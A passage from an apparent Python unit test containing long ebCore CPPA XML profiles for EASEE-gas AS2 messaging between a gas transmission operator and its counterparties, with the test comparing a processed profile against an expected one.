</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_6_18">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUG"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_7_20">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_7_22">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUE"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_8_24">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUJ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">N/A</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="N/A" id="ab_9_26">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_10_28">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_10_30">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUH"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A11</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_11_32">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSO"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_12_34">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_12_36">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_13_38">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_13_40">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_14_42">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_14_44">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A06</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_15_46">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_15_48">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_16_50">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_16_52">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_17_54">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_17_56">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSH"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_18_58">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_18_60">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_19_62">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A06</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_20_64">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_20_66">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_21_68">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_22_70">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Meter Read"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_23_72">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Mark Tr"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_24_74">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="FACILITY OPERATOR"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A10</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_25_76">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="StorageLNGOperator"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_26_78">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTY"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_27_80">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_27_82">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTZ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_28_84">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_28_86">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTU"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_29_88">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_29_90">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_30_92">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_30_94">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTT"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_31_96">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_31_98">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_32_100">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_32_102">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZTV"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A05</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_33_104">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="Consumer"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_34_106">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="SU"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_35_108">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZAA"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_36_110">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/initiator"/>
<cppa:CounterPartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/responder"/>
<cppa:ServiceBinding>
<cppa:Service>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/service</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/test" id="ab_37_112">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/responder"/>
<cppa:CounterPartyRole name="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/initiator"/>
<cppa:ServiceBinding>
<cppa:Service>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/service</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/core/200704/test" id="ab_38_114">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:AS2Channel id="b_ch_send" transport="tr_send">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature>
<cppa:SigningCertificateRef certId="_SCNXER"/>
</cppa:Signature>
<cppa:Encryption/>
<cppa:ErrorHandling>
<cppa:ReceiverErrorsReportChannelId>b_ch_send_signals</cppa:ReceiverErrorsReportChannelId>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
<cppa:ReceiptChannelId>b_ch_send_signals</cppa:ReceiptChannelId>
</cppa:ReceiptHandling>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_send_signals" asResponse="true">
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile/MDN</cppa:ChannelProfile>
<cppa:Signature/>
</cppa:AS2Channel>
<cppa:AS2Channel id="b_ch_receive" transport="tr_receive" >
<cppa:ChannelProfile>http://easee-gas.eu/AS2-Profile</cppa:ChannelProfile>
<cppa:Signature />
<cppa:Encryption>
<cppa:EncryptionCertificateRef certId="_4UP74O"/>
</cppa:Encryption>
</cppa:AS2Channel>
<cppa:HTTPTransport id="tr_send">
<cppa:ClientIPv4>1.2.3.4</cppa:ClientIPv4>
</cppa:HTTPTransport>
<cppa:HTTPTransport id="tr_receive">
<cppa:Endpoint>https://tso1.eu/as2</cppa:Endpoint>
</cppa:HTTPTransport>
<cppa:PayloadProfile id="edigas">
<cppa:PayloadPart maxOccurs="1" minOccurs="1">
<cppa:PartName>businessdocument</cppa:PartName>
<cppa:MIMEContentType>application/xml</cppa:MIMEContentType>
<cppa:Property maxOccurs="1" minOccurs="1" name="EDIGASDocumentType"/>
</cppa:PayloadPart>
</cppa:PayloadProfile>
<cppa:SOAPWithAttachmentsEnvelope id="entsog_package">
<cppa:SimpleMIMEPart PartName="businessdocument" />
</cppa:SOAPWithAttachmentsEnvelope>
</cppa:CPP>""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ProfileInfo>
<cppa:ProfileIdentifier>EASEE-gas AS2 Profile for TSO 2</cppa:ProfileIdentifier>
</cppa:ProfileInfo>
<cppa:PartyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<cppa:PartyName xml:lang="en">TSO 2</cppa:PartyName>
<cppa:PartyId type="http://www.entsoe.eu/eic-codes/eic-party-codes-x">21X-EU-B-A0A0A-B</cppa:PartyId>
<cppa:PartyContact>
<cppa:ContactType>Technical Contact</cppa:ContactType>
<cppa:DirectTelephone>+3761234560</cppa:DirectTelephone>
<cppa:Email>edi@tso2.eu</cppa:Email>
</cppa:PartyContact>
<cppa:Certificate id="_SCNXER">
<ds:KeyInfo>
<ds:KeyName>Signing certificate for TSO 2</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:Certificate id="_4UP74O">
<ds:KeyInfo>
<ds:KeyName>Encryption certificate for TSO 2</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBhbmRlciBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:CertificateDefaults>
<cppa:SigningCertificateRef certId="_SCNXER"/>
<cppa:EncryptionCertificateRef certId="_4UP74O"/>
</cppa:CertificateDefaults>
</cppa:PartyInfo>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSZ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_1_2">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_1_4">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A10</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_2_6">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_2_8">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZHC"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_3_10">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUA"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_4_12">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUF"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A11</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_5_14">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_6_16">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_6_18">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUG"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_7_20">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_7_22">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUE"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A07</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_8_24">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUJ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">N/A</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="N/A" id="ab_9_26">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A04</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_10_28">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_10_30">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUH"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A11</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_11_32">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSO"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A08</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_12_34">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_12_36">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_13_38">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_13_40">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
